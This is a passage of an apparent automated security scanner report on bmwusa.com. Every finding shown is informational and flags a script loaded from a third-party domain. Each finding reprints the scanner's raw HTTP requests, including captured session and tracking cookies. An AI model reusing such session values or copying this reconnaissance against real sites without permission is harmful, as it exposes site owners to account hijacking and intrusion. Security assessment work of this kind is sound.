User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:52 GMT;path=/
Content-Length: 213572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.31. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:44:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:04:20 GMT;path=/
Content-Length: 225243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.32. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:02 GMT;path=/
Content-Length: 216182


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.33. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:22 GMT;path=/
Content-Length: 201997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.34. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:21 GMT;path=/
Content-Length: 213283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.35. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:23 GMT;path=/
Content-Length: 200122


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.36. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:24 GMT;path=/
Content-Length: 214638


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.37. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:34 GMT;path=/
Content-Length: 202358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.38. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:06:27 GMT;path=/
Content-Length: 213670


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.39. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:37 GMT;path=/
Content-Length: 225504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.40. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:14 GMT;path=/
Content-Length: 216027


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.41. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 201997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.42. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 213259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.43. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:33 GMT;path=/
Content-Length: 225720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.44. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
